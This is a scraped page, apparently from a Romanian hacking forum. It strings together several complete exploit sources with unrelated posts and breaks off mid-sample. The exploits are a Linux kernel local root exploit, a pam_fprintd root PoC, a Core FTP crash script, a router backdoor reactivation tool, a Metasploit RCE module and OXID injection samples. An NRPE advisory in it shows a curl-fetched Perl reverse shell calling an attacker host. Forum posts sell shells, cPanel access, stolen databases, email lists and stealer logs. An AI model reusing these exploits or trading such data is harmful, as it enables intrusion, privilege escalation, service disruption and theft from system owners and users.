sensi

/** * Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit * by Vitaly Nikolenko (vnik5287@gmail.com) * * based on semtex.c by sd * * Supported targets: * [0] Ubuntu 12.04.0 - 3.2.0-23-generic * [1] Ubuntu 12.04.1 - 3.2.0-29-generic * [2] Ubuntu 12.04.2 - 3.5.0-23-generic * * $ gcc vnik.c -O2 -o vnik * * $ uname -r * 3.2.0-23-generic * * $ ./vnik 0 */ #define _GNU_SOURCE 1 #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h> #include <assert.h> #define BASE 0x1780000000 #define SIZE 0x0010000000 #define KSIZE 0x2000000 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred); uint64_t targets[3][3] = {{0xffffffff81ef67e0, // perf_swevent_enabled 0xffffffff81091630, // commit_creds 0xffffffff810918e0}, // prepare_kernel_cred {0xffffffff81ef67a0, 0xffffffff81091220, 0xffffffff810914d0}, {0xffffffff81ef5940, 0xffffffff8107ee30, 0xffffffff8107f0c0} }; void __attribute__((regparm(3))) payload() { uint32_t *fixptr = (void*)AB(1); // restore the handler *fixptr = -1; commit_creds_fn commit_creds = (commit_creds_fn)AB(2); prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3); commit_creds(prepare_kernel_cred((uint64_t)NULL)); } void trigger(uint32_t off) { uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 }; int fd = syscall(298, buf, 0, -1, -1, 0); assert( !close(fd) ); } int main(int argc, char **argv) { uint64_t off64, needle, kbase, *p; uint8_t *code; uint32_t int_n, j = 5, target = 1337; int offset = 0; void *map; assert(argc == 2 && "target?"); assert( (target = atoi(argv[1])) < 3 ); struct { uint16_t limit; uint64_t addr; } __attribute__((packed)) idt; // mmap user-space block so we don't page fault // on sw_perf_event_destroy assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); memset(map, 0, SIZE); asm volatile("sidt %0" : "=m" (idt)); kbase = idt.addr & 0xff000000; printf("IDT addr = 0x%lx\n", idt.addr); assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024); memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13); // can only play with interrupts 3, 4 and 0x80 for (int_n = 3; int_n <= 0x80; int_n++) { for (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) { int off32 = off64; if ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) { offset = off32; goto out; } } if (int_n == 4) { // shit, let's try 0x80 if the kernel is compiled with // CONFIG_IA32_EMULATION int_n = 0x80 - 1; } } out: assert(offset); printf("Using int = %d with offset = %d\n", int_n, offset); for (j = 0; j < 3; j++) { needle = AB(j+1); assert(p = memmem(code, 1024, &needle, 8)); *p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j]; } trigger(offset); switch (int_n) { case 3: asm volatile("int $0x03"); break; case 4: asm volatile("int $0x04"); break; case 0x80: asm volatile("int $0x80"); } assert(!setuid(0)); return execl("/bin/bash", "-sh", NULL); } source

/* darklena. fprintd/pam_fprintd local root PoC. However dbus-glib plays an important role. * * (C) 2013 Sebastian Krahmer, all rights reversed. * * pam_fprintd uses net.reactivated.Fprint service to trigger finger swiping and * registers DBUS signal inside the PAM authentication function: * * dbus_g_proxy_add_signal(dev, "VerifyStatus", G_TYPE_STRING, G_TYPE_BOOLEAN, NULL); * dbus_g_proxy_add_signal(dev, "VerifyFingerSelected", G_TYPE_STRING, NULL); * dbus_g_proxy_connect_signal(dev, "VerifyStatus", G_CALLBACK(verify_result), * data, NULL); * * Then, when the DBUS signal arrives, the signal argument is basically just checked * to be the "verify-match" string; which however is expected to come from the legit * net.reactivated.Fprint service. Since there is no message filter registered in either * pam_fprintd, nor inside dbus-glib which it is using, such signals can be spoofed * by anyone. In order to do so, we first need to spoof a NameOwnerChanged signal * so the dbus_g_proxy_manager_filter() function inside dbus-glib will find our * sender-name (which cannot be spoofed) inside its hash tables and match it to * net.reactivated.Fprint. * * To test this PoC, start a service (su is fine) as user that is using pam_fprintd. * On a second xterm, when you see 'Swipe your ... finger' message start this PoC * and you will notice that a rootshell is spawned in the first xterm w/o giving your finger. * * Used various DBUS tutorials and example code, while writing this. * * $ cc darklena.c `pkg-config --cflags dbus-1` -ldbus-1 -Wall * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <dbus/dbus.h> void die(const char *s) { perror(s); exit(errno); } int main(int argc, char **argv) { DBusError err; DBusConnection *conn = NULL; DBusMessage *vrfy_msg = NULL, *noc_msg = NULL, *nl_msg = NULL, *reply = NULL; dbus_uint32_t serial = 0; dbus_bool_t t = 1; int un = 0, i = 0, reply_to = -1; const char *vrfy_match = "verify-match", *cname = NULL, *name = "net.reactivated.Fprint", *prev_owner = NULL; char dest[32]; /* override unique name of net.reactivated.Fprint */ if (argc > 1) prev_owner = strdup(argv[1]); printf("\n[**] darklena, pam_fprintd PoC exploit 2013\n\n"); printf("[*] Initializing DBUS ...\n"); dbus_error_init(&err); conn = dbus_bus_get(DBUS_BUS_SYSTEM, &err); if (dbus_error_is_set(&err)) { fprintf(stderr, "Error: %s\n", err.message); die("dbus_error_is_set"); } if ((cname = dbus_bus_get_unique_name(conn)) == NULL) die("dbus_bus_get_unique_name"); un = atoi(strchr(cname, '.') + 1); printf("[+] Done. Found my unique name: %s (%d)\n", cname, un); if (!prev_owner) { printf("[*] Trying to find unique name of '%s' ...\n", name); nl_msg = dbus_message_new_method_call("org.freedesktop.DBus", "/org/freedesktop/DBus", "org.freedesktop.DBus", "GetNameOwner"); if (!dbus_message_append_args(nl_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_INVALID)) die("[-] dbus_message_append_args"); reply = dbus_connection_send_with_reply_and_block(conn, nl_msg, reply_to, &err); dbus_message_unref(nl_msg); if (dbus_error_is_set(&err)) { fprintf (stderr, "[-] Error: %s\n", err.message); die("[-] dbus_connection_send_with_reply_and_block"); } if (!dbus_message_get_args(reply, &err, DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_INVALID)) { fprintf(stderr, "[-] Error: %s\n", err.message); die("[-] dbus_message_get_args"); } dbus_message_unref(reply); } printf("[+] Found unique name of '%s' as '%s'\n", name, prev_owner); for (i = 1; i < 20; ++i) { /* spoof a NameOwnerChanged signal */ noc_msg = dbus_message_new_signal("/org/freedesktop/DBus", "org.freedesktop.DBus", "NameOwnerChanged"); /* spoof a VerifyStatus */ vrfy_msg = dbus_message_new_signal("/net/reactivated/Fprint/Device/0", "net.reactivated.Fprint.Device", "VerifyStatus"); if (!vrfy_msg || !noc_msg) die("[-] dbus_message_new_signal"); if (!dbus_message_append_args(noc_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_STRING, &cname, DBUS_TYPE_INVALID)) die("[-] dbus_message_append_args1"); if (!dbus_message_append_args(vrfy_msg, DBUS_TYPE_STRING, &vrfy_match, DBUS_TYPE_BOOLEAN, &t, DBUS_TYPE_INVALID)) die("[-] dbus_message_append_args2"); /* iterate over unique names short below under our own * to hit the previously started su */ snprintf(dest, sizeof(dest), ":1.%d", un - i); printf("[*] Using new destination: %s\n", dest); if (!dbus_message_set_destination(vrfy_msg, dest)) die("[-] dbus_message_set_destination"); if (!dbus_message_set_destination(noc_msg, dest)) die("[-] dbus_message_set_destination"); if (!dbus_connection_send(conn, noc_msg, &serial)) die("[-] dbus_connection_send"); dbus_connection_flush(conn); usleep(1000); if (!dbus_connection_send(conn, vrfy_msg, &serial)) die("[-] dbus_connection_send"); dbus_connection_flush(conn); dbus_message_unref(vrfy_msg); dbus_message_unref(noc_msg); } printf("\n[**] Here comes the pain! (but no one's to too innocent to die)\n"); return 0; } source

Vand: • Shell-uri - $2 / buc • cPanele - $2 / buc • 14 DB-uri de la diferite site-uri de jocuri online (toate ~ 300 MB) - $80 • Mail-uri: UK (+700k) - $40 / 100k DE (+350k) - $45 / 100k USA (+900k) - $50 / 100k LU (+500k) - $50 / 100k Hotmail (+400k) - $35 / 100k Yahoo (+550k) - $35 / 100k And other (+900k) - $30 / 100k • Loguri (stealer) - pretul in functie de "cantitate" Metoda de plata bitcoin & perfectmoney. Pentru mai multe detalii, PM.

#!/usr/bin/python import socket,sys,time def Usage(): print ("Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.") print ("Usage: ./coreftp_dos.py <host> <port> <username> <password>") print ("Ex: ./coreftp_dos.py 192.168.10.10 21 ftp ftp\n") if len(sys.argv) <> 5: Usage() sys.exit(1) else: host=sys.argv[1] port=sys.argv[2] user=sys.argv[3] passwd=sys.argv[4] evil = '\x41' * 210 print "[+] Trying to crash Core FTP server with " + str(len(evil)) + " buffer bytes" print "[+] Host: " + host + " Port: " + port + " User: " + user + " Pass: " + passwd print "[+] Attempting to connect to the remote Core FTP Server..." first = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port=int(port) try: connect = first.connect((host, port)) except: print "[-] There was an error while trying to connect to the remote FTP Server" sys.exit(1) print "[+] Connection to remote server successfully... now trying to authenticate" first.recv(1024) first.send('USER ' + user + '\r\n') first.recv(1024) first.send('PASS ' + passwd + '\r\n') first.recv(1024) first.send('dir\r\n'); first.send('TYPE ' + evil + '\r\n') try: first.recv(1024) except: print "[-] Couldn\'t authenticate in the remote FTP server" sys.exit(1) print "[+] First buffer was sent, waiting 30 seconds to send a second time with some more bad data..." first.close() second = socket.socket(socket.AF_INET, socket.SOCK_STREAM) time.sleep(30) try: connect = second.connect((host, port)) except: print "[-] FTP Server isn\'t responding... it might had successfully crashed." sys.exit(1) second.send('USER ' + user + '\r\n') second.recv(1024) second.send('PASS ' + passwd + '\r\n') second.recv(1024) second.send('TYPE ' + evil + '\r\n') second.recv(1024) print "[+] By now, Core FTP Server should had crashed and will not accept new connections." second.close() sys.exit(0) source

Usor, usor se cam duce farmecul forum-ului. Si sa nu se inteleaga gresit, hacking-ul nu se rezuma doar la root-uri. Azi interzicem vanzarea root-urilor, maine paginilor de facebook (care pana la urma de unde stim noi ca nu-s si alea furate?), poimaine nologinele, socks si alte chestii care se gasesc pe la market. Mai bine se implementeaza un sistem "verified seller", cu o suma stabilita de staff, in felul asta scoatem hostu'. Anyway, fiecare partea rea, are si o parte buna.

UP! Ofer 27$ bitcoin pentru 22$ paypal.

UP! $30 bitcoin to paypal?!

Imi vreau cele 5 minute inapoi. Uee!

$15 bitcoin to paypal...careva interesat?

Felicitari baieti! +1 pentru RST Trist ca doar la topicurile de cacat sunt 100 de pagini si 145.656.32543,21 de reply-uri... //Esti sigur ca ai testat pe versiunea vBulletin 5.1?

============================================= - Release date: 17.04.2014 - Discovered by: Dawid Golunski - Severity: High ============================================= I. VULNERABILITY ------------------------- NRPE - Nagios Remote Plugin Executor <= 2.15 Remote Command Execution II. BACKGROUND ------------------------- Nagios is an open source computer system monitoring, network monitoring and infrastructure monitoring software application. Nagios offers monitoring and alerting services for servers, switches, applications, and services. It alerts the users when things go wrong and alerts them a second time when the problem has been resolved. The NRPE (Nagios Remote Plugin Executor) addon is designed to allow you to execute Nagios plugins on remote Linux/Unix machines. The main reason for doing this is to allow Nagios to monitor "local" resources (like CPU load, memory usage, etc.) on remote machines. Since these public resources are not usually exposed to external machines, an agent like NRPE must be installed on the remote Linux/Unix machines. III. INTRODUCTION ------------------------- Nagios Remote Plugin Executor (NRPE) contains a vulnerability that could allow an attacker to remotely inject and execute arbitrary code on the host under NRPE account (typically 'nagios'). The vulnerability is due to NRPE not properly sanitizing user input before passing it to a command shell as a part of a configured command. In order for an attacker to take advantage of the host NRPE must be compiled and configured with command arguments. No authentication is required to exploit this vulnerability if the NRPE port has not been protected with a firewall. IV. DESCRIPTION ------------------------- NRPE expects definitions of commands in nrpe.cfg config file. Some of the examples given in the config with hardcoded arguments are: command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10 command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20 command[check_hda1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /dev/hda1 when command arguments are enabled then user is also allowed to define commands with variables like: command[check_users]=/usr/local/nagios/libexec/check_users -w $ARG1$ -c $ARG2$ command[check_disk]=/usr/local/nagios/libexec/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$ This is often suggested for convenience in various nagios/nrpe setup tutorials on the web. To get a result from a defined command in NRPE daemon the following nrpe client can be used with -a option that passes arguments: # /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a 4 4 USERS OK - 4 users currently logged in |users=4;4;4;0 in case check_users command was defined with arguments as shown above NRPE would execute: /usr/local/nagios/libexec/check_users -w 4 -c 4 on the local system. As we can find in the source code of nrpe-2.15/src/nrpe.c NRPE daemon uses popen() function for command execution: /* executes a system command via popen(), but protects against timeouts */ int my_system(char *command,int timeout,int *early_timeout,char *output,int output_length){ ----cut---- /* run the command */ fp=popen(command,"r"); using popen() results in the command being executed with the help of a command shell. Before this function is reached however NRPE takes several measures to prevent malicious command injection to the shell. That includes filtration based on a blacklist: #define NASTY_METACHARS "|`&><'\"\\[]{};" /* make sure request doesn't contain nasties */ if(contains_nasty_metachars(pkt->buffer)==TRUE){ syslog(LOG_ERR,"Error: Request contained illegal metachars!"); that prevents bash special characters like semicolon, pipe etc. The code is also making sure that arguments do not contain bash command substitution i.e. $(ps aux) if(strstr(macro_argv[x],"$(")) { syslog(LOG_ERR,"Error: Request contained a bash command substitution!"); return ERROR; Despite these checks the code is vulnerable to command injection as bash shell allows for multiple command execution if commands are separated by a new line. None of the checks examines the arguments for an occurrence of a new line character: 0x0A V. PROOF OF CONCEPT ------------------------- To execute an arbitrary command an attacker could simply add a new line character after a parameter and follow it with his own command. To run touch /tmp/vulntest command an attacker could use the check_nrpe client with arguments: # /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4 which make NRPE daemon run the following series of commands: /usr/local/nagios/libexec/check_users -w <new_line> touch /tmp/vulntest # -c 4 and a file /tmp/vulntest would be created with nagios user as the owner. The hash character is to comment out the the rest of the arguments. An attacker gets a limited set of commands as most of the metacharacters are prohibited by the blacklist. So for example it's difficult to create new files in the system without using > symbol etc. An attacker could however download a snippet of perl/python etc. code from the web by using wget or curl command and get a reverse shell. This would allow unrestricted access to the command line: ---------[revshell.pl on attackers-server]--------- #!/usr/bin/perl use Socket; #attackers ip to connect back to $i="10.10.10.40"; $p=8080; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))) { open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); } -------------------------------------------------- /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a "`echo -e "\x0a curl -o /tmp/tmp_revshell http://attackers-server/revshell.pl \x0a perl /tmp/tmp_revshell # "` 4 " [attacker@10.10.10.40 ]# nc -v -l 8080 Connection from 10.10.10.5 port 8080 [tcp/ddi-tcp-1] accepted sh-4.1$ id uid=501(nagios) gid=501(nagios) groups=501(nagios),502(nagcmd) sh-4.1$ sh-4.1$ cat /etc/passwd | head -n 4 ; pwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin / sh-4.1$ ls -l /tmp/tmp_revshell -rw-rw-r-- 1 nagios nagios 269 Apr 17 05:14 /tmp/tmp_revshell sh-4.1$ rm -f /tmp/tmp_revshell VI. BUSINESS IMPACT ------------------------- An attacker could exploit the vulnerability to gain access to the system in the context of a nagios user this could lead to further compromise of the server. VII. SYSTEMS AFFECTED ------------------------- Current version of NRPE 2.15 and older are vulnerable. VIII. SOLUTION ------------------------- Disable command arguments if possible. Protect access to NRPE port and only allow access from a trusted nagios server. Install updated version of NRPE when it becomes available. IX. REFERENCES ------------------------- http://www.nagios.org http://sourceforge.net/projects/nagios/files/nrpe-2.x/ http://exchange.nagios.org/directory/Addons/Monitoring-Agents/NRPE--2D-Nagios-Remote-Plugin-Executor/details http://legalhackers.com/advisories/nagios-nrpe.txt X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com legalhackers.com XI. REVISION HISTORY ------------------------- April 17th, 2014: Advisory created XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. source

/*************************************** * PoC to reactivate Sercomm TCP/32674 backdoor * See http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf * Eloi Vanderbeken - Synacktiv * * THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * PoC based on Wilmer van der Gaast's code * http://wiki.openwrt.org/_media/toh/netgear/dg834.g.v4/nftp.c ***************************************/ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <sys/ioctl.h> #include <sys/socket.h> #include <linux/if_ether.h> #include <linux/if_packet.h> #include <linux/if_arp.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #define ETH_P_NFTP 0x8888 enum backdoor_command { PING_BACKDOOR = 0x200, SCFGMGR_LAUNCH, SET_IP }; struct ether_header { unsigned char ether_dhost[ETH_ALEN]; unsigned char ether_shost[ETH_ALEN]; unsigned short ether_type; } eth; struct raw_packet { struct ether_header header; uint16_t type; uint16_t sequence; uint16_t offset; uint16_t chunk; uint16_t payload_len; uint8_t payload[528]; }; int main(int argc, char *argv[]) { int sockfd, res, i, len; char src_mac[ETH_ALEN]; struct ifreq iface; struct sockaddr_ll socket_address; struct raw_packet packet; memset(&packet, 0, sizeof(packet)); if (argc < 2) { fprintf(stderr, "usage : %s [IFNAME]\n", argv[0]); exit(1); } sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (sockfd == -1) { if(geteuid() != 0) { fprintf(stderr, "You should probably run this program as root.\n"); } perror("socket"); exit(1); } seteuid(getuid()); strncpy(iface.ifr_name, argv[1], IFNAMSIZ); res = ioctl(sockfd, SIOCGIFHWADDR, &iface); if(res < 0) { perror("ioctl"); exit(1); } memcpy(src_mac, iface.ifr_hwaddr.sa_data, ETH_ALEN); res = ioctl(sockfd, SIOCGIFINDEX, &iface); if(res < 0) { perror("ioctl"); exit(1); } // set src mac memcpy(packet.header.ether_shost, src_mac, ETH_ALEN); // broadcast memset(packet.header.ether_dhost, 0xFF, ETH_ALEN); // MD5("DGN1000") memcpy(packet.payload, "\x45\xD1\xBB\x33\x9B\x07\xA6\x61\x8B\x21\x14\xDB\xC0\xD7\x78\x3E", 0x10); packet.payload_len = htole16(0x10); // ethernet packet type = 0x8888 packet.header.ether_type = htons(ETH_P_NFTP); // launch TCP/32764 backdoor packet.type = htole16(SCFGMGR_LAUNCH); socket_address.sll_family = PF_PACKET; socket_address.sll_protocol = htons(ETH_P_NFTP); socket_address.sll_ifindex = iface.ifr_ifindex; socket_address.sll_hatype = ARPHRD_ETHER; socket_address.sll_pkttype = PACKET_OTHERHOST; // broadcast socket_address.sll_halen = ETH_ALEN; memset(socket_address.sll_addr, 0xFF, ETH_ALEN); res = sendto(sockfd, &packet, 0x10 + 24, 0, (struct sockaddr *)&socket_address, sizeof(socket_address)); if (res == -1) { perror("sendto"); exit(1); } do { memset(&packet, 0, sizeof(packet)); res = recvfrom(sockfd, &packet, sizeof(packet), 0, NULL, NULL); if (res == -1) { perror("recvfrom"); exit(1); } } while (ntohs(packet.header.ether_type) != ETH_P_NFTP); if (res < sizeof(packet) - sizeof(packet.payload)) { fprintf(stderr, "packet is too short: %d bytes\n", res); exit(1); } len = be16toh(packet.payload_len); // SerComm has a real problem with endianness printf("received packet: %d bytes (payload len = %d) from ", res, len); for (i = 0; i < ETH_ALEN; i++) printf("%02X%c", packet.header.ether_shost[i], i == ETH_ALEN-1 ? '\n' : ':'); for (i = 0; (i < len) && (i < sizeof(packet.payload)); i++) { printf("%02X ", packet.payload[i]); if ((i+1) % 16 == 0) printf("\n"); } printf("\n"); return 0; } source

Pacat de timpul si banii irositi in vb5, mai bine pastram versiunea asta (ar trebuii facut un poll), multe lume ii multumita de versiunea actuala... // Cei care nu se pot loga, stergeti iar cookie si cache.

Salut, am un cod Ukash in valoare de 20e si as vrea perfectmoney sau paypal in schimb, cei interesati contactati-ma pe privat.

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Fitnesse Wiki Remote Command Execution', 'Description' => %q{ This module exploits a vulnerability found in Fitnesse Wiki, version 20140201 and earlier. }, 'Author' => [ 'Jerzy Kramarz', ## Vulnerability discovery 'Veerendra G.G <veerendragg {at} secpod.com>', ## Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-1216' ], [ 'OSVDB', '103907' ], [ 'BID', '65921' ], [ 'URL', 'http://secpod.org/blog/?p=2311' ], [ 'URL', 'http://secpod.org/msf/fitnesse_wiki_rce.rb' ], [ 'URL', 'http://seclists.org/fulldisclosure/2014/Mar/1' ], [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/' ] ], 'Privileged' => false, 'Payload' => { 'Space' => 1000, 'BadChars' => "", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', ## ##'RequiredCmd' => 'generic telnet', ## payloads cmd/windows/adduser and cmd/windows/generic works perfectly } }, 'Platform' => %w{ win }, 'Arch' => ARCH_CMD, 'Targets' => [ ['Windows', { 'Platform' => 'win' } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 25 2014')) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [true, 'Fitnesse Wiki base path', '/']) ], self.class) end def check print_status("#{peer} - Trying to detect Fitnesse Wiki") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) if res && res.code == 200 && res.body.include?(">FitNesse<") print_good("#{peer} - FitNesse Wiki Detected!") return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def http_send_command(command) ## Construct random page in WikiWord format uri = normalize_uri(target_uri.path, 'TestP' + rand_text_alpha_lower(7)) res = send_request_cgi({ 'method' => 'GET', 'uri' => uri + "?edit" }) if !res || res.code != 200 fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!") end print_status("#{peer} - Retrieving edit time and ticket id") ## Get Edit Time and Ticket Id from the response res.body =~ /"editTime" value="((\d)+)"/ edit_time = $1 res.body =~ /"ticketId" value="((-?\d)+)"/ ticket_id = $1 ## Validate we are able to extract Edit Time and Ticket Id if !edit_time or !ticket_id print_error("#{peer} - Failed to get Ticket Id / Edit Time.") return end print_status("#{peer} - Attempting to create '#{uri}'") ## Construct Referer referer = "http://#{rhost}:#{rport}" + uri + "?edit" ## Construct command to be executed page_content = '!define COMMAND_PATTERN {%m} !define TEST_RUNNER {' + command + '}' print_status("#{peer} - Injecting the payload") ## Construct POST request to create page with malicious commands ## inserted in the page res = send_request_cgi( { 'uri' => uri, 'method' => 'POST', 'headers' => {'Referer' => referer}, 'vars_post' => { 'editTime' => edit_time, 'ticketId' => ticket_id, 'responder' => 'saveData', 'helpText' => '', 'suites' => '', '__EDITOR__1' => 'textarea', 'pageContent' => page_content, 'save' => 'Save', } }) if res && res.code == 303 print_status("#{peer} - Successfully created '#{uri}' with payload") end ## Execute inserted command print_status("#{peer} - Sending exploit request") res = send_request_cgi({ 'method' => 'GET', 'uri' => uri + "?test" }) if res && res.code == 200 print_status("#{peer} - Successfully sent exploit request") end ## Cleanup by deleting the created page print_status("#{peer} - Execting cleanup routine") referer = "http://#{rhost}:#{rport}" + uri + "?deletePage" res = send_request_cgi( { 'uri' => uri + "?deletePage", 'method' => 'POST', 'headers' => {'Referer' => referer}, 'vars_post' => { 'confirmed' => 'Yes', } }) end def exploit http_send_command(payload.encoded) end end source

Depinde cine vrea sa te gaseasca... Daca vrea colegul tau Ion de la 3, care-i place foarte mult cs-u si sta 17/24 pe feisbuc nu prea are sanse, dar daca ai facut nasoale, sansele sa te prinda cresc.

# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities # Google Dork: - # Date: 12/2013 # Exploit Author: //sToRm # Author mail: storm@sicherheit-online.org # Vendor Homepage: http://www.oxid-esales.com # Software Link: - # Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4 # Tested on: Multiple platforms # CVE : CVE-2014-2016 + CVE-2014-2017 (reserved) ########################################################################################################### # XSS vulnerability ####################################################################################### Under certain circumstances, an attacker can trick a user to enter a specially crafted URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that theoretically can be used to gain unauthorized access to a user account or collect sensitive information of this user. SAMPLE: ------------------------------------------------------------------------------- http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS] --------------------------------------------------------------------------------------- Products: OXID eShop Enterprise Edition OXID eShop Professional Edition OXID eShop Community Edition Releases: All previous releases Platforms: All releases are affected on all platforms. STATE - Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4. - A fix for OXID eShop version 4.6.8 is available. Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001 ########################################################################################################### ########################################################################################################### ########################################################################################################### # Multiple CRLF injection / HTTP response splitting ####################################################### Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability that theoretically can be used to poison cache, gain unauthorized access to a user account or collect sensitive information of this user. A possible exploit by passing such a mal-formed URI could lead to: - return of a blank page or a PHP error (depending on one's server configuration) - set unsolicited browser cookies Products: OXID eShop Enterprise Edition OXID eShop Professional Edition OXID eShop Community Edition Releases: All previous releases Platforms: All releases are affected on all platforms. STATE: - Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4. - A fix for OXID eShop version 4.6.8 is available. Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002 Vulnerability details: ########################################################################################################### # 1 # CRLF injection / HTTP response splitting ############################################################ PATH: ROOT/index.php PARAMETER: anid CONCEPT: -------------------------------------------------------------------------------------------------- actcontrol=start &aid=1 &am=1 &anid=%0d%0a%20[INJECT:INJECT] &cl=start &fnc=tobasket ?=0 &pgNr=0 &stoken=1 ----------------------------------------------------------------------------------------------------------- SAMPLE: --- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket?=0&pgNr=0&stoken=1 ----------------------------------------------------------------------------------------------------------- ########################################################################################################### ########################################################################################################### ########################################################################################################### # 2 # CRLF injection / HTTP response splitting ############################################################ PATH: ROOT/index.php PARAMETER: cnid CONCEPT: -------------------------------------------------------------------------------------------------- actcontrol=details &aid=1 &am=1 &anid=0 &cl=details &cnid=%0d%0a%20[INJECTED:INJECTED] &fnc=tobasket ?=0 &listtype=list &panid= &parentid=1 &stoken=1 &varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- SAMPLE: --- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket?=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- ########################################################################################################### ########################################################################################################### ########################################################################################################### # 3 # CRLF injection / HTTP response splitting ############################################################ PATH: ROOT/index.php PARAMETER: listtype CONCEPT: -------------------------------------------------------------------------------------------------- actcontrol=details &aid=1 &am=1 &anid=0 &cl=details &cnid=0 &fnc=tobasket ?=0 &listtype=%0d%0a%20[INJECTED:INJECTED] &panid= &parentid=0 &stoken=0 &varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- SAMPLE: --- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ 